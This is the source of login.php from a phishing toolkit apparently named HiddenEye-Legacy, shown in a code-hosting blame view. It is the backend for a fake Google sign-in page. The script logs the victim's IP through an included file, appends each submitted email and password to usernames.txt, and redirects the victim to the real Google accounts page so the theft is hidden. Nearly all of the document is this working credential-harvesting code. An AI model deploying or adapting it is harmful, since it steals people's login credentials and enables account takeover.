HiddenEye-Legacy/WebPages/google_advanced_web/login.php

7 lines
213 B
PHP
Raw Normal View History

2018-04-24 13:30:11 +08:00
<?php
2018-06-07 17:21:01 +08:00
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: https://accounts.google.com');
2018-04-24 13:30:11 +08:00
exit();